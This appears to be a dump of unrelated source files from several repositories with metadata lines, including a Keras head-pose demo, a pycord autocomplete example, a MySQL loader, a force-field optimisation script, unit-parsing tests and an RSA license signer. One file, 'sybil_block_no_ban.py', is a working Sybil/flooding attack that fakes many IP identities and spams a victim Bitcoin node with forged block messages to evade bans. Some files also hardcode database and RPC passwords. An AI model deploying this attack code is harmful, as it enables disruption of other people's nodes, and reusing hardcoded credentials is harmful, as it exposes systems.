None: self.x = x_and_y[0] self.y = x_and_y[1] settings = Settings( setting_loader=Coords, setting_dumper=lambda obj: (obj.x, obj.y), data={ "location 1": Coords(x_and_y=(1, 2)), "location 2": Coords(x_and_y=(3, 4)), "patterns": Settings( setting_loader=re.compile, setting_dumper=lambda x: x.pattern, data={ "phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"), "email address pattern": re.compile( r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+" ), }, ), }, ) settings_dict = settings.dump_to_dict() assert settings_dict["location 1"] == (1, 2) assert settings_dict["location 2"] == (3, 4) assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}" assert ( settings_dict["patterns"]["email address pattern"] == r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+" ) settings.load_from_dict(settings_dict) assert settings["location 1"] == Coords(x_and_y=(1, 2)) assert settings["location 2"] == Coords(x_and_y=(3, 4)) assert settings["patterns"]["phone number pattern"] == re.compile( r"\d{3}-?\d{3}-?\d{4}" ) assert settings["patterns"]["email address pattern"] == re.compile( r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+" ) def test_init_without_keywords() -> None: with pytest.raises(TypeError): Settings("sample settings file path.json")
27.84507
86
0.527466
170
0.017198
0
0
185
0.018715
0
0
2,407
0.2435
4c5b696f9bc64bbbc8bda141e564e9a8de0891a8
5,910
py
Python
demo/demo_FSANET_ssd.py
jacke121/FSA-Net
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
[ "Apache-2.0" ]
null
null
null
demo/demo_FSANET_ssd.py
jacke121/FSA-Net
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
[ "Apache-2.0" ]
null
null
null
demo/demo_FSANET_ssd.py
jacke121/FSA-Net
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
[ "Apache-2.0" ]
null
null
null
import os import time import cv2 import sys sys.path.append('..') import numpy as np from math import cos, sin from lib.FSANET_model import * import numpy as np from keras.layers import Average def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50): print(yaw,roll,pitch) pitch = pitch * np.pi / 180 yaw = -(yaw * np.pi / 180) roll = roll * np.pi / 180 if tdx != None and tdy != None: tdx = tdx tdy = tdy else: height, width = img.shape[:2] tdx = width / 2 tdy = height / 2 # X-Axis pointing to right. drawn in red x1 = size * (cos(yaw) * cos(roll)) + tdx y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy # Y-Axis | drawn in green # v x2 = size * (-cos(yaw) * sin(roll)) + tdx y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy # Z-Axis (out of the screen) drawn in blue x3 = size * (sin(yaw)) + tdx y3 = size * (-cos(yaw) * sin(pitch)) + tdy cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3) cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3) cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2) return img def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model): # loop over the detections if detected.shape[2]>0: for i in range(0, detected.shape[2]): # extract the confidence (i.e., probability) associated with the # prediction confidence = detected[0, 0, i, 2] # filter out weak detections if confidence > 0.5: # compute the (x, y)-coordinates of the bounding box for # the face and extract the face ROI (h0, w0) = input_img.shape[:2] box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0]) (startX, startY, endX, endY) = box.astype("int") # print((startX, startY, endX, endY)) x1 = startX y1 = startY w = endX - startX h = endY - startY x2 = x1+w y2 = y1+h xw1 = max(int(x1 - ad * w), 0) yw1 = max(int(y1 - ad * h), 0) xw2 = min(int(x2 + ad * w), img_w - 1) yw2 = min(int(y2 + ad * h), img_h - 1) cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2) start=time.time() faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size)) faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX) face = np.expand_dims(faces[i,:,:,:], axis=0) p_result = model.predict(face) print('fangxiang',time.time()-start) face = face.squeeze() img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2]) input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img return input_img def main(): os.makedirs('./img',exist_ok=True) img_size = 64 img_idx = 0 ad = 0.6 #Parameters num_capsule = 3 dim_capsule = 16 routings = 2 stage_num = [3,3,3] lambda_d = 1 num_classes = 3 image_size = 64 num_primcaps = 7*3 m_dim = 5 S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim] model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)() model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)() num_primcaps = 8*8*3 S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim] model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)() weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5' model1.load_weights(weight_file1) print('Finished loading model 1.') weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5' weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5' model2.load_weights(weight_file2) print('Finished loading model 2.') model3.load_weights(weight_file3) print('Finished loading model 3.') inputs = Input(shape=(64,64,3)) x1 = model1(inputs) #1x1 x2 = model2(inputs) #var x3 = model3(inputs) #w/o avg_model = Average()([x1,x2,x3]) model = Model(inputs=inputs, outputs=avg_model) # load our serialized face detector from disk print("[INFO] loading face detector...") protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"]) modelPath = os.path.sep.join(["face_detector", "res10_300x300_ssd_iter_140000.caffemodel"]) net = cv2.dnn.readNetFromCaffe(protoPath, modelPath) # capture video cap = cv2.VideoCapture(0) # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1) # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1) while True: # get video frame ret, input_img = cap.read() img_idx = img_idx + 1 img_h, img_w, _ = np.shape(input_img) blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0, (300, 300), (104.0, 177.0, 123.0)) net.setInput(blob) detected = net.forward() faces = np.empty((detected.shape[2], img_size, img_size, 3)) input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model) # cv2.imwrite('img/'+str(img_idx)+'.png',input_img) cv2.imshow("result", input_img) key = cv2.waitKey(1) if __name__ == '__main__': main()
34.16185
122
0.577496
0
0
0
0
0
0
0
0
1,142
0.193232
4c5b93a68b2014eb34642b9dabeaf09a9053d01e
5,118
py
Python
examples/app_commands/slash_autocomplete.py
Mihitoko/pycord
137c1474eed5fb4273e542bd22ad76764a8712fc
[ "MIT" ]
null
null
null
examples/app_commands/slash_autocomplete.py
Mihitoko/pycord
137c1474eed5fb4273e542bd22ad76764a8712fc
[ "MIT" ]
null
null
null
examples/app_commands/slash_autocomplete.py
Mihitoko/pycord
137c1474eed5fb4273e542bd22ad76764a8712fc
[ "MIT" ]
1
2022-02-20T09:10:40.000Z
2022-02-20T09:10:40.000Z
import discord from discord.commands import option bot = discord.Bot(debug_guilds=[...]) COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"] LOTS_OF_COLORS = [ "aliceblue", "antiquewhite", "aqua", "aquamarine", "azure", "beige", "bisque", "blueviolet", "brown", "burlywood", "cadetblue", "cornflowerblue", "cornsilk", "crimson", "cyan", "darkblue", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen", "fuchsia", "gainsboro", "ghostwhite", "gold", "goldenrod", "gray", "green", "greenyellow", "grey", "honeydew", "hotpink", "indianred", "indigo", "ivory", "khaki", "lavender", "lavenderblush", "lawngreen", "lightcoral", "maroon", "mediumaquamarine", "mediumblue", "mediumorchid", "midnightblue", "navajowhite", "navy", "oldlace", "olive", "olivedrab", "orange", "orangered", "orchid", "palegoldenrod", "palegreen", "plum", "powderblue", "purple", "red", "rosybrown", "royalblue", "saddlebrown", "sienna", "springgreen", "steelblue", "tan", "teal", "thistle", "tomato", "turquoise", "violet", "wheat", "white", "whitesmoke", "yellow", "yellowgreen", ] BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example async def color_searcher(ctx: discord.AutocompleteContext): """ Returns a list of matching colors from the LOTS_OF_COLORS list. In this example, we've added logic to only display any results in the returned list if the user's ID exists in the BASIC_ALLOWED list. This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function. """ return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED] async def get_colors(ctx: discord.AutocompleteContext): """Returns a list of colors that begin with the characters entered so far.""" return [color for color in COLORS if color.startswith(ctx.value.lower())] async def get_animals(ctx: discord.AutocompleteContext): """Returns a list of animals that are (mostly) the color selected for the "color" option.""" picked_color = ctx.options["color"] if picked_color == "red": return ["cardinal", "ladybug"] elif picked_color == "orange": return ["clownfish", "tiger"] elif picked_color == "yellow": return ["goldfinch", "banana slug"] elif picked_color == "green": return ["tree frog", "python"] elif picked_color == "blue": return ["blue jay", "blue whale"] elif picked_color == "indigo": return ["eastern indigo snake"] # Needs to return an iterable even if only one item elif picked_color == "violet": return ["purple emperor butterfly", "orchid dottyback"] else: return ["rainbowfish"] @bot.slash_command(name="ac_example") @option("color", description="Pick a color!", autocomplete=get_colors) @option("animal", description="Pick an animal!", autocomplete=get_animals) async def autocomplete_example( ctx: discord.ApplicationContext, color: str, animal: str, ): """ Demonstrates using ctx.options to create options that are dependent on the values of other options. For the `color` option, a callback is passed, where additional logic can be added to determine which values are returned. For the `animal` option, the callback uses the input from the color option to return an iterable of animals """ await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.") @bot.slash_command(name="ac_basic_example") @option( "color", description="Pick a color from this big list!", autocomplete=discord.utils.basic_autocomplete(color_searcher), # Demonstrates passing a callback to discord.utils.basic_autocomplete ) @option( "animal", description="Pick an animal from this small list", autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]), # Demonstrates passing a static iterable discord.utils.basic_autocomplete ) async def autocomplete_basic_example( ctx: discord.ApplicationContext, color: str, animal: str, ): """ This demonstrates using the discord.utils.basic_autocomplete helper function. For the `color` option, a callback is passed, where additional logic can be added to determine which values are returned. For the `animal` option, a static iterable is passed. While a small amount of values for `animal` are used in this example, iterables of any length can be passed to discord.utils.basic_autocomplete Note that the basic_autocomplete function itself will still only return a maximum of 25 items. """ await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!") bot.run("TOKEN")
27.079365
112
0.657679
0
0
0
0
2,025
0.395662
2,852
0.557249
3,085
0.602775
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c
11,522
py
Python
tools/Networking/sybil_block_no_ban.py
simewu/bitcoin_researcher
b9fd2efdb8ae8467c5bd4b3320713a541635df16
[ "MIT" ]
1
2020-02-15T21:44:04.000Z
2020-02-15T21:44:04.000Z
tools/Networking/sybil_block_no_ban.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
tools/Networking/sybil_block_no_ban.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
from _thread import start_new_thread from bitcoin.messages import * from bitcoin.net import CAddress from bitcoin.core import CBlock from io import BytesIO as _BytesIO import atexit import bitcoin import fcntl import hashlib import json import os import random import re import socket import struct import sys import time import datetime if os.geteuid() != 0: sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n") # Specify the attacker's genuine IP attacker_ip = input('\nEnter attacker\'s IP address: ') # Specify the victim's IP, and port (8333 for Bitcoin) victim_ip = input('Enter victim\'s IP address: ') victim_port = 8333 # How many identities should run simultaneously num_identities = 8 # While attacking the victim, wait this many seconds before sending each version message seconds_between_version_packets = 0.1 identity_interface = [] # Keeps the IP alias interface and IP for each successful connection identity_address = [] # Keeps the IP and port for each successful connection identity_socket = [] # Keeps the socket for each successful connection # The file where the iptables backup is saved, then restored when the script ends iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules' # Send commands to the Linux terminal def terminal(cmd): return os.popen(cmd).read() # Send commands to the Bitcoin Core Console def bitcoin(cmd): return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read() # Generate a random identity using the broadcast address template def random_ip(): # By forcing the IP to be above a certain threshhold, it prevents a lot of errors minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1 while(True): ip = broadcast_address old_ip = '' while(old_ip != ip): old_ip = ip ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1) # Don't accept already assigned IPs if ip == default_gateway: continue if ip == victim_ip: continue if ip not in [x[0] for x in identity_address]: break return ip #return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}' # Checking the internet by sending a single ping to Google #def internet_is_active(): # return os.system('ping -c 1 google.com') == 0 # If all else fails, we can use this to recover the network #def reset_network(): # print('Resetting network...') # terminal(f'sudo ifconfig {network_interface} {attacker_ip} down') # terminal(f'sudo ifconfig {network_interface} {attacker_ip} up') # Create an alias for a specified identity def ip_alias(ip_address): global alias_num print(f'Setting up IP alias {ip_address} on {network_interface}') interface = f'{network_interface}:{alias_num}' terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up') alias_num += 1 return interface # Construct a block packet using python-bitcoinlib def block_packet_bytes(): hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32)) hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32)) nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little') nNonce = random.getrandbits(32) msg = CBlock( nVersion=bitcoin_protocolversion, hashPrevBlock=hashPrevBlock, #hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', hashMerkleRoot=hashMerkleRoot, #hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', nTime=nTime, nBits=0, nNonce=nNonce, vtx=() ) name = 'block' f = _BytesIO() msg.stream_serialize(f) body = f.getvalue() res = b'\xf9\xbe\xb4\xd9' res += name.encode() res += b"\x00" * (12 - len(name)) res += struct.pack(b"<I", len(body)) #th = hashlib.sha256(body).digest() # add checksum #h = hashlib.sha256(th).digest() #res += h[:4] res += bytearray(random.getrandbits(8) for _ in range(4)) res += body return res # Construct a version packet using python-bitcoinlib def version_packet(src_ip, dst_ip, src_port, dst_port): msg = msg_version(bitcoin_protocolversion) msg.nVersion = bitcoin_protocolversion msg.addrFrom.ip = src_ip msg.addrFrom.port = src_port msg.addrTo.ip = dst_ip msg.addrTo.port = dst_port # Default is /python-bitcoinlib:0.11.0/ msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node return msg # Close a connection def close_connection(socket, ip, port, interface): socket.close() terminal(f'sudo ifconfig {interface} {ip} down') if socket in identity_socket: identity_socket.remove(socket) else: del socket if interface in identity_interface: identity_interface.remove(interface) if (ip, port) in identity_address: identity_address.remove((ip, port)) print(f'Successfully closed connection to ({ip} : {port})') # Creates a fake connection to the victim def make_fake_connection(src_ip, dst_ip, verbose=True): src_port = random.randint(1024, 65535) dst_port = victim_port print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...') interface = ip_alias(src_ip) identity_interface.append(interface) if verbose: print(f'Successfully set up IP alias on interface {interface}') if verbose: print('Resulting ifconfig interface:') if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n') if verbose: print('Setting up iptables configurations') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP') if verbose: print('Creating network socket...') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if verbose: print(f'Setting socket network interface to "{network_interface}"...') success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8')) while success == -1: print(f'Setting socket network interface to "{network_interface}"...') success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8')) time.sleep(1) print(network_interface) if verbose: print(f'Binding socket to ({src_ip} : {src_port})...') s.bind((src_ip, src_port)) if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...') try: s.connect((dst_ip, dst_port)) except: close_connection(s, src_ip, src_port, interface) make_fake_connection(random_ip(), dst_ip, False) return # Send version packet version = version_packet(src_ip, dst_ip, src_port, dst_port) s.send(version.to_bytes()) # Get verack packet verack = s.recv(1924) # Send verack packet verack = msg_verack(bitcoin_protocolversion) s.send(verack.to_bytes()) # Get verack packet verack = s.recv(1024) if verbose: print('Connection successful!') identity_address.append((src_ip, src_port)) identity_socket.append(s) # Listen to the connections for future packets if verbose: print('Attaching attacker script {interface}') try: start_new_thread(attack, (), { 'socket': s, 'src_ip': src_ip, 'src_port': src_port, 'dst_ip': dst_ip, 'dst_port': dst_port, 'interface': interface }) except: print('Error: unable to start thread to sniff interface {interface}') # Send version repeatedly, until banned def attack(socket, src_ip, src_port, dst_ip, dst_port, interface): block = block_packet_bytes() while True: if seconds_between_version_packets != 0: time.sleep(seconds_between_version_packets) try: socket.send(block) except Exception as e: print(e) break close_connection(socket, src_ip, src_port, interface) print(f'Peer was banned ({src_ip} : {src_port})') make_fake_connection(random_ip(), dst_ip, False) # Initialize the network def initialize_network_info(): print('Retrieving network info...') global default_gateway, network_interface, broadcast_address # Get the network interface of the default gateway m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route')) if m != None: default_gateway = m.group(1).strip() network_interface = m.group(2).strip() else: print('Error: Network interface couldn\'t be found.') sys.exit() # Get the broadcast address of the network interface # Used as an IP template of what can change, so that packets still come back to the sender m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}')) if m != None: broadcast_address = m.group(1).strip() else: print('Error: Network broadcast IP couldn\'t be found.') sys.exit() # Initialize Bitcoin info def initialize_bitcoin_info(): print('Retrieving bitcoin info...') global bitcoin_subversion global bitcoin_protocolversion bitcoin_subversion = '/Satoshi:0.18.0/' bitcoin_protocolversion = 70015 try: network_info = None #json.loads(bitcoin('getnetworkinfo')) if 'subversion' in network_info: bitcoin_subversion = network_info['subversion'] if 'protocolversion' in network_info: bitcoin_protocolversion = network_info['protocolversion'] except: pass # Save a backyp of the iptable rules def backup_iptables(): terminal(f'iptables-save > {iptables_file_path}') # Restore the backup of the iptable rules def cleanup_iptables(): if(os.path.exists(iptables_file_path)): print('Cleaning up iptables configuration') terminal(f'iptables-restore < {iptables_file_path}') os.remove(iptables_file_path) # Remove all ip aliases that were created by the script def cleanup_ipaliases(): for i in range(0, len(identity_address)): try: ip = identity_address[i][0] interface = identity_interface[i] print(f'Cleaning up IP alias {ip} on {interface}') terminal(f'sudo ifconfig {interface} {ip} down') except: pass # This function is ran when the script is stopped def on_close(): print('Closing open sockets') for socket in identity_socket: socket.close() cleanup_ipaliases() cleanup_iptables() print('Cleanup complete. Goodbye.') #print('Verifying that internet works...') #if not internet_is_active(): # reset_network() # This is the first code to run if __name__ == '__main__': global alias_num alias_num = 0 # Increments each alias initialize_network_info() initialize_bitcoin_info() atexit.register(on_close) # Make on_close() run when the script terminates cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring backup_iptables() # Create the connections for i in range(1, num_identities + 1): try: make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip) except ConnectionRefusedError: print('Connection was refused. The victim\'s node must not be running.') print(f'Successful connections: {len(identity_address)}\n') # Prevent the script from terminating when the sniff function is still active while 1: time.sleep(60)
34.497006
359
0.743881
0
0
0
0
0
0
0
0
5,543
0.48108
4c5c39c5c86dfe51c79bcbc35385263a0ba508a1
1,638
py
Python
spider/db.py
aloneZERO/douban-movie-visualization
8e59c4d0b00df1b240a5dce09093ae4984fd7118
[ "WTFPL" ]
null
null
null
spider/db.py
aloneZERO/douban-movie-visualization
8e59c4d0b00df1b240a5dce09093ae4984fd7118
[ "WTFPL" ]
null
null
null
spider/db.py
aloneZERO/douban-movie-visualization
8e59c4d0b00df1b240a5dce09093ae4984fd7118
[ "WTFPL" ]
null
null
null
#!python3 ''' 数据库操作类 author: justZero email: [email protected] date: 2017-8-6 ''' import time import pandas as pd import numpy as np import pymysql import pymysql.cursors import pprint class MySQLdb(object): def __init__(self): self.conn = pymysql.connect( host='localhost', user='root', passwd='root', db='douban_movie', port=8889, charset='utf8', cursorclass=pymysql.cursors.DictCursor) self.conn.autocommit(True) self.cursor = self.conn.cursor() def close(self): self.conn.close() self.cursor.close() # 批量插入 def __insert_many(self, sql, params): self.cursor.executemany(sql, params) # 电影数据插入 def insert_movie(self, params): sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \ 'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)' self.__insert_many(sql, params) # 统计数据插入 def insert_rate(self, params): sql = 'insert into rate(name,category,rate) values(%s,%s,%s)' self.__insert_many(sql, params) if __name__ == '__main__': inputFile = 'data/douban_movie_clean.txt' movies_df = pd.read_csv(inputFile, sep='^') movies = np.array(movies_df).tolist() db = MySQLdb() try: db.insert_movie(movies) except Exception as e: raise e finally: db.close()
25.2
156
0.566545
1,171
0.696195
0
0
0
0
0
0
484
0.287753
4c5d1777ffd1452788619a58c2a3c09a88985225
2,077
py
Python
examples/rxff-serial/run.py
sctiwari/EZFF_ASE
94710d4cf778ff2db5e6df0cd6d10d92e1b98afe
[ "MIT" ]
3
2019-01-22T21:22:09.000Z
2019-04-02T22:50:40.000Z
examples/rxff-serial/run.py
ElsevierSoftwareX/SOFTX-D-20-00066
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
[ "MIT" ]
14
2019-01-14T18:33:15.000Z
2019-07-08T22:10:11.000Z
examples/rxff-serial/run.py
ElsevierSoftwareX/SOFTX-D-20-00066
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
[ "MIT" ]
3
2019-03-24T23:43:13.000Z
2021-09-12T13:45:08.000Z
import ezff from ezff.interfaces import gulp, qchem # Define ground truths gt_gs = qchem.read_structure('ground_truths/optCHOSx.out') gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out') gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out') gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out') def my_error_function(rr): # Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs try: path = str(pool.rank) except: path = '0' # Calculate Ground State md_gs_job = gulp.job(path = path) md_gs_job.structure = gt_gs md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff') md_gs_job.options['pbc'] = False md_gs_job.options['relax_atoms'] = False md_gs_job.options['relax_cell'] = False # Run GULP calculation md_gs_job.run(command='gulp') # Read output from completed GULP job and clean-up md_gs_energy = md_gs_job.read_energy() md_gs_job.cleanup() # Calculate PES Scan md_scan_job = gulp.job(path = path) md_scan_job.structure = gt_scan md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff') md_scan_job.options['pbc'] = False md_scan_job.options['relax_atoms'] = False md_scan_job.options['relax_cell'] = False # Run GULP calculation md_scan_job.run(command='gulp') # Read output from completed GULP job and clean-up md_scan_energy = md_scan_job.read_energy() md_scan_job.cleanup() # Calculate error total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform') return [total_error] # Read template and variable ranges bounds = ezff.read_variable_bounds('variable_bounds', verbose=False) template = ezff.read_forcefield_template('template') problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template) algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16) ezff.optimize(problem, algorithm, iterations = 5)
37.763636
124
0.735676
0
0
0
0
0
0
0
0
590
0.284064
4c5db4db71b2cfe512dcdca6c87e641cb929544e
2,288
py
Python
dev_files/utils.py
dylanwal/unit_parse
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
[ "BSD-3-Clause" ]
1
2022-01-29T17:14:40.000Z
2022-01-29T17:14:40.000Z
dev_files/utils.py
dylanwal/unit_parse
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
[ "BSD-3-Clause" ]
null
null
null
dev_files/utils.py
dylanwal/unit_parse
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
[ "BSD-3-Clause" ]
null
null
null
import logging from testing_func import testing_func, test_logger from unit_parse import logger, Unit, Q from unit_parse.utils import * test_logger.setLevel(logging.DEBUG) logger.setLevel(logging.DEBUG) test_split_list = [ # positive control (changes) [["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}], [["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}], [["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}], [["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}], # negative control (no changes) [["fish"], ["fish"], {"chunks": ["fish"]}], [["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}], [[Unit("g")], [Unit("g")], {"chunks": ["is"]}], ] testing_func(split_list, test_split_list) test_round_off = [ # [Input, Output] # positive control (works) [234.2342300000001, 234.23423, {"sig_digit": 15}], [234.2342399999999999, 234.23424, {"sig_digit": 15}], [234.2342300000001, 234.23, {"sig_digit": 5}], [234.2342399999999999, 234.23, {"sig_digit": 5}], [234.2342399999999999, 200, {"sig_digit": 1}], [-234.2342399999999999, -200, {"sig_digit": 1}], [-234.2342399999999999, -234.23424, {"sig_digit": 15}], # negative control (fails) ] testing_func(sig_figs, test_round_off) test_list_depth = [ # [Input, Output] # positive control (works) ["", 0], [[], 0], ["asds", 0], [1, 0], [["aaa"], 1], [[["aaa"]], 2], [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2], [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2], [[[["aaa"], ["aaa"], ["aaa"]]], 3], # negative control (fails) ] testing_func(get_list_depth, test_list_depth) test_remove_empty_cells = [ # [Input, Output] # positive control (works) [[], None], [[""], None], [["asds"], ["asds"]], [1, 1], [["aaa", ""], ["aaa"]], [["aaa", []], ["aaa"]], [[["aaa", []]], [["aaa"]]], [[["aaa", [""]]], [["aaa"]]], # negative control (fails) ] testing_func(remove_empty_cells, test_remove_empty_cells) examples_quantity_difference = [ [Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}], [5, 1, {"quantity2": Q("10 g")}], ] testing_func(quantity_difference, examples_quantity_difference)
27.566265
89
0.542832
0
0
0
0
0
0
0
0
784
0.342657
4c5e8dbae6d19592874e45bede3206b69cd9c042
594
py
Python
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
import sys from Crypto.Signature import pkcs1_15 from Crypto.Hash import SHA256 from Crypto.PublicKey import RSA def sign_data(key, data, output_file): with open(key, 'r', encoding='utf-8') as keyFile: rsakey = RSA.importKey(keyFile.read()) signer = pkcs1_15.new(rsakey) digest = SHA256.new(data.encode('utf-8')) with open(output_file, 'wb') as out: out.write(signer.sign(digest)) if __name__ == '__main__': key_file = sys.argv[1] input_string = sys.argv[2] out_file = sys.argv[3] sign_data(key_file, input_string, out_file)
28.285714
53
0.66835
0
0
0
0
0
0
0
0
31
0.052189
4c5f21108bc3014442b8b88f1279054fc89706f5
5,302
py
Python
freqtrade/strategy/informative_decorator.py
Fractate/freqbot
47b35d2320dc97977411454c1466c762d339fdee
[ "MIT" ]
1
2022-03-06T22:44:30.000Z
2022-03-06T22:44:30.000Z
freqtrade/strategy/informative_decorator.py
Fractate/freqbot
47b35d2320dc97977411454c1466c762d339fdee
